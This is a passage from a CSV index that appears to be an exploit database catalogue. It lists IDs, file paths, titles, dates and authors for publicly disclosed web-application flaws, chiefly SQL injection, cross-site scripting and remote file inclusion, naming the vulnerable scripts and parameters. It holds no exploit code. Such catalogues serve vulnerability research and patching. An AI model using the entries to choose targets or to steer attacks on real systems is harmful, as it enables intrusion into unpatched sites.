Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28630,exploits/php/webapps/28630.txt,"BandSite CMS 1.1 - 'mp3_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28631,exploits/php/webapps/28631.txt,"BandSite CMS 1.1 - 'news_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28632,exploits/php/webapps/28632.txt,"BandSite CMS 1.1 - 'pastshows_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28633,exploits/php/webapps/28633.txt,"BandSite CMS 1.1 - 'photo_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28634,exploits/php/webapps/28634.txt,"BandSite CMS 1.1 - 'releases_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28635,exploits/php/webapps/28635.txt,"BandSite CMS 1.1 - 'reviews_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28636,exploits/php/webapps/28636.txt,"BandSite CMS 1.1 - 'shows_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28637,exploits/php/webapps/28637.txt,"BandSite CMS 1.1 - 'signgbook_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28638,exploits/php/webapps/28638.txt,"BandSite CMS 1.1 - 'footer.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28644,exploits/php/webapps/28644.txt,"Google Mini Search Appliance 4.4.102.M.36 - Information Disclosure",2006-09-22,"Patrick Webster",php,webapps, -28645,exploits/php/webapps/28645.txt,"CakePHP 1.1.7.3363 - 'Vendors.php' Directory Traversal",2006-09-22,"James Bercegay",php,webapps, -28646,exploits/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",php,webapps, -28647,exploits/php/webapps/28647.txt,"PLESK 7.5/7.6 - 'FileManager.php' Directory Traversal",2006-09-22,GuanYu,php,webapps, -28649,exploits/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,hardware,webapps, -28695,exploits/php/webapps/28695.txt,"CubeCart 3.0.x - '/admin/forgot_pass.php?user_name' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps, -40359,exploits/osx/webapps/40359.txt,"Airmail 3.0.2 - Cross-Site Scripting",2016-09-09,redrain,osx,webapps, -28696,exploits/php/webapps/28696.txt,"CubeCart 3.0.x - 'view_order.php?order_id' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps, -28697,exploits/php/webapps/28697.txt,"CubeCart 3.0.x - 'view_doc.php?view_doc' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps, -28698,exploits/php/webapps/28698.txt,"CubeCart 3.0.x - '/admin/print_order.php?order_id' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps, -28699,exploits/php/webapps/28699.txt,"CubeCart 3.0.x - '/admin/print_order.php?order_id' Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps, -28652,exploits/hardware/webapps/28652.txt,"Asus RT-N66U 3.0.0.4.374_720 - Cross-Site Request Forgery",2013-09-30,cgcai,hardware,webapps,80 -28653,exploits/linux/webapps/28653.txt,"mod_accounting Module 0.5 - Blind SQL Injection",2013-09-30,Wireghoul,linux,webapps, -28654,exploits/php/webapps/28654.txt,"XAMPP 1.8.1 - 'lang.php?WriteIntoLocalDisk method' Local Write Access",2013-09-30,"Manuel García Cárdenas",php,webapps,80 -28656,exploits/php/webapps/28656.txt,"SimpleRisk 20130915-01 - Multiple Vulnerabilities",2013-09-30,"Ryan Dewhurst",php,webapps,80 -28661,exploits/php/webapps/28661.txt,"ToendaCMS 1.0.4 - 'Media.php' Directory Traversal",2006-09-24,MoHaJaLi,php,webapps, -28662,exploits/php/webapps/28662.txt,"Photostore - 'details.php?gid' Cross-Site Scripting",2006-09-25,meto5757,php,webapps, -28663,exploits/php/webapps/28663.txt,"Photostore - 'view_photog.php?photogid' Cross-Site Scripting",2006-09-25,meto5757,php,webapps, -28664,exploits/php/webapps/28664.txt,"Opial AV Download Management 1.0 - 'index.php' Cross-Site Scripting",2006-09-25,meto5757,php,webapps, -28665,exploits/php/webapps/28665.txt,"WWWThreads 5.4 - 'Cat' Multiple Cross-Site Scripting Vulnerabilities",2006-09-25,Root3r_H3ll,php,webapps, -28667,exploits/php/webapps/28667.txt,"BirdBlog 1.x - 'comment.php?entryid' Cross-Site Scripting",2006-09-25,Root3r_H3ll,php,webapps, -28668,exploits/php/webapps/28668.txt,"BirdBlog 1.x - 'index.php?page' Cross-Site Scripting",2006-09-25,Root3r_H3ll,php,webapps, -28669,exploits/php/webapps/28669.txt,"BirdBlog 1.x - 'user.php?uid' Cross-Site Scripting",2006-09-25,Root3r_H3ll,php,webapps, -28670,exploits/php/webapps/28670.txt,"DanPHPSupport 0.5 - 'index.php?page' Cross-Site Scripting",2006-09-25,You_You,php,webapps, -28671,exploits/php/webapps/28671.txt,"DanPHPSupport 0.5 - 'admin.php?do' Cross-Site Scripting",2006-09-25,You_You,php,webapps, -28672,exploits/php/webapps/28672.pl,"BBSNew 2.0.1 - 'index2.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps, -28673,exploits/php/webapps/28673.txt,"Exporia 0.3 - 'Common.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps, -28674,exploits/php/webapps/28674.pl,"Back-End CMS 0.4.5 - '/admin/index.php?includes_path' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps, -28675,exploits/php/webapps/28675.txt,"Back-End CMS 0.4.5 - 'Facts.php?includes_path' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps, -28676,exploits/php/webapps/28676.txt,"Back-End CMS 0.4.5 - 'search.php?includes_path' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps, -28684,exploits/php/webapps/28684.txt,"Gnew 2013.1 - Multiple Vulnerabilities (2)",2013-10-02,"High-Tech Bridge SA",php,webapps,80 -28685,exploits/php/webapps/28685.txt,"GLPI 0.84.1 - Multiple Vulnerabilities",2013-10-02,"High-Tech Bridge SA",php,webapps, -28686,exploits/php/webapps/28686.txt,"My-BIC 0.6.5 - 'Mybic_Server.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps, -28687,exploits/php/webapps/28687.txt,"PHP_news 2.0 - 'user_user.php?language' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps, -28688,exploits/php/webapps/28688.txt,"PHP_news 2.0 - '/admin/news.php?language' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps, -28689,exploits/php/webapps/28689.txt,"PHP_news 2.0 - '/admin/catagory.php?language' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps, -28690,exploits/php/webapps/28690.txt,"PHP_news 2.0 - 'creat_news_all.php?language' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps, -28691,exploits/php/webapps/28691.txt,"Quickblogger 1.4 - Remote File Inclusion",2006-09-25,You_You,php,webapps, -28692,exploits/php/webapps/28692.txt,"Phoenix Evolution CMS - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-26,Root3r_H3ll,php,webapps, -28693,exploits/php/webapps/28693.txt,"Phoenix Evolution CMS - '/modules/pageedit/index.php?pageid' Cross-Site Scripting",2006-09-26,Root3r_H3ll,php,webapps, -28701,exploits/php/webapps/28701.txt,"CubeCart 3.0.x - '/admin/nav.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-26,"HACKERS PAL",php,webapps, -28702,exploits/php/webapps/28702.txt,"CubeCart 3.0.x - '/admin/image.php?image' Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps, -28703,exploits/php/webapps/28703.txt,"CubeCart 3.0.x - '/admin/header.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-26,"HACKERS PAL",php,webapps, -28704,exploits/php/webapps/28704.txt,"CubeCart 3.0.x - 'footer.inc.php?la_pow_by' Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps, -28729,exploits/php/webapps/28729.txt,"phpBB XS 0.58 - Multiple Remote File Inclusions",2006-09-30,xoron,php,webapps, -28730,exploits/php/webapps/28730.txt,"OlateDownload 3.4 - 'details.php?page' SQL Injection",2006-09-29,Hessam-x,php,webapps, -28727,exploits/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Inclusions",2006-09-28,D_7J,php,webapps, -28731,exploits/php/webapps/28731.txt,"OlateDownload 3.4 - 'search.php?query' SQL Injection",2006-09-29,Hessam-x,php,webapps, -28732,exploits/php/webapps/28732.txt,"Yblog - 'funk.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps, -28733,exploits/php/webapps/28733.txt,"Yblog - 'tem.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps, -28734,exploits/php/webapps/28734.txt,"Yblog - 'uss.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps, -29275,exploits/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 - 'SurgeFTPMGR.cgi' Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps, -29276,exploits/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 - 'ProductDetails.asp' SQL Injection",2006-12-11,ajann,asp,webapps, -28728,exploits/php/webapps/28728.txt,"Geotarget - 'script.php' Remote File Inclusion",2006-09-29,"RaVeR shi mozi",php,webapps, -28708,exploits/php/webapps/28708.txt,"elproLOG MONITOR Webaccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,php,webapps,80 -28709,exploits/php/webapps/28709.txt,"FlashChat 6.0.2 < 6.0.8 - Arbitrary File Upload",2013-10-04,x-hayben21,php,webapps,80 -28711,exploits/php/webapps/28711.txt,"PHP Invoice 2.2 - 'home.php' Cross-Site Scripting",2006-09-26,meto5757,php,webapps, -28712,exploits/php/webapps/28712.txt,"CMS Formulasi 2.07 - Multiple Vulnerabilities",2013-10-04,"Sarahma Security",php,webapps,80 -28714,exploits/php/webapps/28714.txt,"PHPSelect Web Development - 'index.php3' Remote File Inclusion",2006-09-27,rUnViRuS,php,webapps, -29274,exploits/php/webapps/29274.html,"Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (1)",2013-10-29,"Marcela Benetrix",php,webapps,80 -28716,exploits/php/webapps/28716.txt,"MKPortal 1.0/1.1 - 'PMPopup.php' Cross-Site Scripting",2006-09-27,HanowarS,php,webapps, -29279,exploits/php/webapps/29279.txt,"Olat CMS 7.8.0.1 - Persistent Cross-Site Scripting",2013-10-29,Vulnerability-Lab,php,webapps, -28719,exploits/php/webapps/28719.txt,"Joomla! Component VirtueMart Joomla! eCommerce Edition 1.0.11 - Multiple Input Validation Vulnerabilities",2006-09-27,"Adrian Castro",php,webapps, -28720,exploits/php/webapps/28720.txt,"Web//News 1.4 - 'parser.php' Remote File Inclusion (2)",2006-09-27,ThE-WoLf-KsA,php,webapps, -28721,exploits/php/webapps/28721.txt,"Red Mombin 0.7 - 'index.php' Cross-Site Scripting",2006-09-22,"Armorize Technologies",php,webapps, -28722,exploits/php/webapps/28722.txt,"Red Mombin 0.7 - 'process_login.php' Cross-Site Scripting",2006-09-22,"Armorize Technologies",php,webapps, -28723,exploits/php/webapps/28723.txt,"Aanval 7.1 build 70151 - Multiple Vulnerabilities",2013-10-04,xistence,php,webapps,80 -28736,exploits/php/webapps/28736.txt,"DeluxeBB 1.09 - 'Sig.php' Remote File Inclusion",2006-10-02,r0ut3r,php,webapps, -28737,exploits/php/webapps/28737.txt,"PHP Web Scripts Easy Banner - 'functions.php' Remote File Inclusion",2006-10-02,"abu ahmed",php,webapps, -28738,exploits/php/webapps/28738.txt,"Digishop 4.0 - 'cart.php' Cross-Site Scripting",2006-10-02,meto5757,php,webapps, -28740,exploits/php/webapps/28740.txt,"HAMweather 3.9.8 - 'template.php' Script Code Injection",2006-10-03,"James Bercegay",php,webapps, -28741,exploits/php/webapps/28741.txt,"Yener Haber Script 1.0/2.0 - SQL Injection",2006-10-04,Dj_ReMix,php,webapps, -28742,exploits/asp/webapps/28742.txt,"ASPPlayGround.NET Forum 2.4.5 - 'Calendar.asp' Cross-Site Scripting",2006-10-27,MizoZ,asp,webapps, -28743,exploits/php/webapps/28743.txt,"osCommerce 2.2 - '/admin/banner_manager.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28744,exploits/php/webapps/28744.txt,"osCommerce 2.2 - '/admin/banner_statistics.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28745,exploits/php/webapps/28745.txt,"osCommerce 2.2 - '/admin/countries.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28746,exploits/php/webapps/28746.txt,"osCommerce 2.2 - '/admin/currencies.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28747,exploits/php/webapps/28747.txt,"osCommerce 2.2 - '/admin/languages.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28748,exploits/php/webapps/28748.txt,"osCommerce 2.2 - '/admin/manufacturers.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28752,exploits/php/webapps/28752.txt,"osCommerce 2.2 - '/admin/products_expected.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28753,exploits/php/webapps/28753.txt,"osCommerce 2.2 - '/admin/reviews.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28754,exploits/php/webapps/28754.txt,"osCommerce 2.2 - '/admin/specials.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28755,exploits/php/webapps/28755.txt,"osCommerce 2.2 - '/admin/stats_products_purchased.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28756,exploits/php/webapps/28756.txt,"osCommerce 2.2 - '/admin/stats_products_viewed.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28757,exploits/php/webapps/28757.txt,"osCommerce 2.2 - '/admin/tax_classes.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28758,exploits/php/webapps/28758.txt,"osCommerce 2.2 - '/admin/tax_rates.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28759,exploits/php/webapps/28759.txt,"osCommerce 2.2 - '/admin/zones.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28761,exploits/php/webapps/28761.txt,"WikyBlog 1.2.x - 'index.php' Remote File Inclusion",2006-10-05,MoHaNdKo,php,webapps, -28762,exploits/asp/webapps/28762.txt,"Civica - 'Display.asp' SQL Injection",2006-10-05,CodeXpLoder'tq,asp,webapps, -28767,exploits/php/webapps/28767.txt,"AckerTodo 4.2 - 'login.php' Multiple SQL Injections",2006-10-06,"Francesco Laurita",php,webapps, -28768,exploits/asp/webapps/28768.html,"Emek Portal 2.1 - 'Uyegiris.asp' SQL Injection",2006-10-06,"Dj ReMix",asp,webapps, -28769,exploits/php/webapps/28769.txt,"Interspire FastFind - 'index.php' Cross-Site Scripting",2006-09-27,MizoZ,php,webapps, -28770,exploits/php/webapps/28770.txt,"Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection",2006-10-08,disfigure,php,webapps, -28771,exploits/php/webapps/28771.pl,"PHP Polling Creator 1.03 - 'functions.inc.php' Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps, -28772,exploits/php/webapps/28772.txt,"ISearch 2.16 - 'ISEARCH_PATH' Remote File Inclusion",2006-10-09,MoHaNdKo,php,webapps, -28773,exploits/php/webapps/28773.txt,"Deep CMS 2.0 - 'index.php' Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps, -28774,exploits/php/webapps/28774.txt,"phpWebSite 0.10.2 - 'PHPWS_SOURCE_DIR' Multiple Remote File Inclusions",2006-10-09,Crackers_Child,php,webapps, -28776,exploits/php/webapps/28776.txt,"EXPBlog 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-10-09,Tamriel,php,webapps, -28777,exploits/php/webapps/28777.txt,"Hastymail 1.x - IMAP SMTP Command Injection",2006-10-10,"Vicente Aguilera Diaz",php,webapps, -28778,exploits/php/webapps/28778.txt,"ironwebmail 6.1.1 - Directory Traversal Information Disclosure",2006-10-16,"Derek Callaway",php,webapps, -28779,exploits/php/webapps/28779.txt,"Album Photo Sans Nom 1.6 - 'Getimg.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps, -28780,exploits/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 - 'Grid3.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps, -28781,exploits/php/webapps/28781.txt,"BlueShoes Framework 4.6 - 'GoogleSearch.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps, -28782,exploits/php/webapps/28782.txt,"Tagit2b - 'DelTagUser.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps, -28783,exploits/php/webapps/28783.txt,"MySQLDumper 1.21 - 'sql.php' Cross-Site Scripting",2006-10-10,Crackers_Child,php,webapps, -28784,exploits/php/webapps/28784.txt,"Gcards 1.13 - 'Addnews.php' Remote File Inclusion",2006-10-11,"DeatH VirUs",php,webapps, -28786,exploits/php/webapps/28786.pl,"CommunityPortals 1.0 - 'bug.php' Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps, -28787,exploits/php/webapps/28787.txt,"Dokeos 1.6.4 - Multiple Remote File Inclusions Vulnerabilities",2006-10-11,viper-haCker,php,webapps, -28790,exploits/php/webapps/28790.txt,"phpList 2.x - Public Pages MultipleCross-Site Scripting Vulnerabilities",2006-10-12,"Michiel Dethmers",php,webapps, -28791,exploits/php/webapps/28791.txt,"PHP TopSites FREE 1.022b - 'config.php' Remote File Inclusion",2006-10-12,"Le CoPrA",php,webapps, -28792,exploits/php/webapps/28792.txt,"MamboLaiThai ExtCalThai 0.9.1 - 'admin_events.php?CONFIG_EXT[LANGUAGES_DIR]' Remote File Inclusion",2006-10-12,k1tk4t,php,webapps, -28793,exploits/php/webapps/28793.txt,"MamboLaiThai ExtCalThai 0.9.1 - 'mail.inc.php?CONFIG_EXT[LIB_DIR]' Remote File Inclusion",2006-10-12,k1tk4t,php,webapps, -28794,exploits/php/webapps/28794.txt,"4Images 1.7 - 'details.php' Cross-Site Scripting",2006-10-12,"Christian Marthen",php,webapps, -28795,exploits/php/webapps/28795.php,"FreeWPS 2.11 - 'upload.php' Remote Command Execution",2006-10-12,"HACKERS PAL",php,webapps, -28796,exploits/php/webapps/28796.pl,"Buzlas 2006-1 Full - 'Archive_Topic.php' Remote File Inclusion",2006-09-29,"Nima Salehi",php,webapps, -28797,exploits/php/webapps/28797.txt,"Bloq 0.5.4 - 'index.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps, -28798,exploits/php/webapps/28798.txt,"Bloq 0.5.4 - 'admin.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps, -28799,exploits/php/webapps/28799.txt,"Bloq 0.5.4 - 'rss.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps, -28800,exploits/php/webapps/28800.txt,"Bloq 0.5.4 - 'rss2.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps, -28801,exploits/php/webapps/28801.txt,"Bloq 0.5.4 - 'rdf.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps, -28802,exploits/php/webapps/28802.txt,"Bloq 0.5.4 - '/files/mainfile.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps, -28803,exploits/php/webapps/28803.txt,"Xoops 2.2.3 - 'search.php' Cross-Site Scripting",2006-10-13,b0rizQ,php,webapps, -28804,exploits/php/webapps/28804.pl,"phpBB Add Name Module - 'Not_Mem.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps, -28807,exploits/php/webapps/28807.py,"WHMCompleteSolution (WHMCS) 5.2.7 - SQL Injection",2013-10-08,localhost.re,php,webapps, -28808,exploits/php/webapps/28808.txt,"WordPress Plugin Quick Contact Form 6.0 - Persistent Cross-Site Scripting",2013-10-08,Zy0d0x,php,webapps, -28814,exploits/php/webapps/28814.txt,"RamaCMS - 'ADODB.Inc.php' Remote File Inclusion",2006-10-13,"Le CoPrA",php,webapps, -28815,exploits/php/webapps/28815.txt,"H-Sphere WebShell 2.x - 'login.php' Cross-Site Scripting",2006-10-14,b0rizQ,php,webapps, -28818,exploits/php/webapps/28818.txt,"Mambo Module MOStlyCE 4.5.4 - 'HTMLTemplate.php' Remote File Inclusion",2006-10-16,The_BeKiR,php,webapps, -28819,exploits/php/webapps/28819.txt,"Lodel CMS 0.7.3 - 'Calcul-page.php' Remote File Inclusion",2006-10-17,The_BeKiR,php,webapps, -28820,exploits/php/webapps/28820.txt,"Webgenius Goop Gallery 2.0 - 'index.php' Cross-Site Scripting",2006-10-17,Lostmon,php,webapps, -28821,exploits/php/webapps/28821.txt,"Maintain 3.0.0-RC2 - 'Example6.php' Remote File Inclusion",2006-10-16,ERNE,php,webapps, -28823,exploits/php/webapps/28823.pl,"PowerMovieList 0.13/0.14 - Edit User HTML Injection",2006-10-16,MP,php,webapps, -28824,exploits/php/webapps/28824.txt,"phpList 2.10.2 - 'index.php' Cross-Site Scripting",2006-10-17,b0rizQ,php,webapps, -28825,exploits/php/webapps/28825.txt,"Dev Web Manager System 1.5 - 'index.php' Cross-Site Scripting",2006-10-17,CorryL,php,webapps, -28826,exploits/php/webapps/28826.txt,"Cerberus Helpdesk 3.2.1 - 'Rpc.php' Unauthorized Access",2006-10-18,jonepet,php,webapps, -28827,exploits/php/webapps/28827.txt,"PHP Live Helper 1.17 - Multiple Remote File Inclusions",2006-10-18,Matdhule,php,webapps, -28828,exploits/php/webapps/28828.txt,"Zorum 3.5 - 'DBProperty.php' Remote File Inclusion",2006-10-19,MoHaNdKo,php,webapps, -28829,exploits/asp/webapps/28829.txt,"Kinesis Interactive Cinema System - 'index.asp' SQL Injection",2006-10-18,fireboy,asp,webapps, -28830,exploits/php/webapps/28830.pl,"Free FAQ 1.0 - 'index.php' Remote File Inclusion",2006-10-19,"Alireza Ahari",php,webapps, -28831,exploits/php/webapps/28831.txt,"Simple Machines Forum (SMF) 1.0/1.1 - 'index.php' Cross-Site Scripting",2006-10-19,b0rizQ,php,webapps, -28832,exploits/php/webapps/28832.txt,"ATutor 1.5.3 - Multiple Remote File Inclusions",2006-10-19,SuBzErO,php,webapps, -28833,exploits/php/webapps/28833.pl,"Casinosoft Casino Script 3.2 - 'config.php' SQL Injection",2006-10-20,G1UK,php,webapps, -28838,exploits/php/webapps/28838.txt,"ClanLite - 'conf-php.php' Remote File Inclusion",2006-10-23,x_w0x,php,webapps, -28839,exploits/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 - '/smumdadotcom_ascyb_alumni/mod.php?katalog Module query' Cross-Site Scripting",2006-10-23,MP,php,webapps, -28840,exploits/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 - 'mod.php?mod' Traversal Local File Inclusion",2006-10-23,MP,php,webapps, -28842,exploits/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - 'Cat' Cross-Site Scripting",2006-10-23,MC.Iglo,php,webapps, -28843,exploits/php/webapps/28843.txt,"cPanel 10.9 - 'dosetmytheme?theme' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps, -28844,exploits/php/webapps/28844.txt,"cPanel 10.9 - 'editzonetemplate?template' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps, -28845,exploits/php/webapps/28845.txt,"Shop-Script - Multiple HTTP Response Splitting Vulnerabilities",2006-10-23,"Debasis Mohanty",php,webapps, -28846,exploits/php/webapps/28846.html,"WikiNi 0.4.x - 'Waka.php' Multiple HTML Injection Vulnerabilities",2006-10-23,"Raphael Huck",php,webapps, -28851,exploits/php/webapps/28851.txt,"Crafty Syntax Live Help 2.9.9 - Multiple Remote File Inclusions",2006-10-24,Crackers_Child,php,webapps, -28854,exploits/multiple/webapps/28854.txt,"Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection",2013-10-10,"Giuseppe D'Amore",multiple,webapps, -28857,exploits/asp/webapps/28857.txt,"Snitz Forums 2000 3.4.6 - 'Pop_Mail.asp' SQL Injection",2006-10-24,"Arham Muhammad",asp,webapps, -28858,exploits/php/webapps/28858.txt,"Simpnews 2.x - 'index.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps, -28859,exploits/php/webapps/28859.txt,"Simpnews 2.x - 'pwlost.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps, -28861,exploits/php/webapps/28861.txt,"Comment IT 0.2 - 'PathToComment' Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps, -28862,exploits/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - 'Init.php' Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps, -28863,exploits/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - 'user.php' Cross-Site Scripting",2006-10-26,r00t,php,webapps, -28864,exploits/php/webapps/28864.txt,"PHPLeague 0.81 - '/consult/miniseul.php?cheminmini' Remote File Inclusion",2006-10-26,ajaan,php,webapps, -28865,exploits/php/webapps/28865.txt,"PHPTreeView 1.0 - 'TreeViewClass.php' Remote File Inclusion",2006-10-27,"Prince Islam",php,webapps, -28866,exploits/php/webapps/28866.txt,"IG Shop 1.4 - 'Change_Pass.php' Cross-Site Scripting",2006-10-30,SnipEr.X,php,webapps, -28867,exploits/php/webapps/28867.txt,"TorrentFlux 2.1 - 'dir.php' Directory Traversal",2006-10-27,Christopher,php,webapps, -28868,exploits/php/webapps/28868.txt,"PLS-Bannieres 1.21 - 'Bannieres.php' Remote File Inclusion",2006-10-27,Mahmood_ali,php,webapps, -28869,exploits/asp/webapps/28869.txt,"Web Wiz Forum 6.34/7.x - 'search.asp' SQL Injection",2006-10-28,almaster,asp,webapps, -28870,exploits/php/webapps/28870.txt,"PunBB 1.x - SQL Injection",2006-10-30,nmsh_sa,php,webapps, -28871,exploits/php/webapps/28871.txt,"Actionpoll 1.1.1 - '/db/DataReaderWriter.php?CONFIG_DB' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps, -28872,exploits/php/webapps/28872.txt,"Actionpoll 1.1.1 - '/db/PollDB.php?CONFIG_DATAREADERWRITER' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps, -28873,exploits/php/webapps/28873.txt,"Exhibit Engine 1.22 - 'fetchsettings.php?toroot' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps, -28874,exploits/php/webapps/28874.txt,"Exhibit Engine 1.22 - 'fstyles.php?toroot' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps, -28875,exploits/php/webapps/28875.txt,"Freenews 1.1 - 'Aff_News.php' Remote File Inclusion",2006-10-30,MoHaNdKo,php,webapps, -28878,exploits/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 - 'login.php?Username' SQL Injection",2006-10-30,poplix,asp,webapps, -28879,exploits/asp/webapps/28879.txt,"Evandor Easy notesManager 0.0.1 - Search Page SQL Injection",2006-10-30,poplix,asp,webapps, -28881,exploits/php/webapps/28881.txt,"Foresite CMS - 'Index_2.php' Cross-Site Scripting",2006-10-30,"David Vieira-Kurz",php,webapps, -28882,exploits/php/webapps/28882.txt,"phpFaber CMS 1.3.36 - 'Htmlarea.php' Cross-Site Scripting",2005-10-30,Vigilon,php,webapps, -28883,exploits/php/webapps/28883.txt,"Easy Web Portal 2.1.2 - Multiple Remote File Inclusions",2006-10-31,MEFISTO,php,webapps, -28885,exploits/php/webapps/28885.php,"PHP-Nuke 7.x Journal Module - 'search.php' SQL Injection",2006-10-31,Paisterist,php,webapps, -28886,exploits/php/webapps/28886.txt,"The Search Engine Project 0.942 - 'Configfunction.php' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps, -28889,exploits/php/webapps/28889.txt,"Netquery 4.0 - 'NQUser.php' Cross-Site Scripting",2006-10-31,"Tal Argoni",php,webapps, -28890,exploits/php/webapps/28890.txt,"iPlanet Messaging Server - Messenger Express Expression() HTML Injection",2006-10-31,LegendaryZion,php,webapps, -28891,exploits/php/webapps/28891.txt,"Mirapoint Web Mail - 'Expression()' HTML Injection",2006-10-31,LegendaryZion,php,webapps, -28892,exploits/php/webapps/28892.txt,"RSSonate - 'Project_Root' Remote File Inclusion",2006-11-01,Arab4services,php,webapps, -28893,exploits/php/webapps/28893.pl,"KnowledgeBuilder 2.2 - 'visEdit_Control.Class.php' Remote File Inclusion",2006-11-08,igi,php,webapps, -28896,exploits/php/webapps/28896.txt,"RunCMS 1.x - Avatar Arbitrary File Upload",2006-11-02,securfrog,php,webapps, -28898,exploits/php/webapps/28898.txt,"FreeWebShop 2.2 - 'index.php' SQL Injection",2006-11-02,Spiked,php,webapps, -28899,exploits/php/webapps/28899.txt,"NewP News Publishing System 1.0 - 'Class.Database.php' Remote File Inclusion",2006-11-07,navairum,php,webapps, -28900,exploits/php/webapps/28900.txt,"ac4p Mobile - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-03,AL-garnei,php,webapps, -28901,exploits/php/webapps/28901.txt,"ac4p Mobile - 'MobileNews.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-03,AL-garnei,php,webapps, -28902,exploits/php/webapps/28902.txt,"ac4p Mobile - 'polls.php' Multiple Cross-Site Scripting Vulnerabilities (1)",2006-11-03,AL-garnei,php,webapps, -28903,exploits/php/webapps/28903.txt,"ac4p Mobile - 'send.php?cats' Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps, -28904,exploits/php/webapps/28904.txt,"ac4p Mobile - 'up.php' Multiple Cross-Site 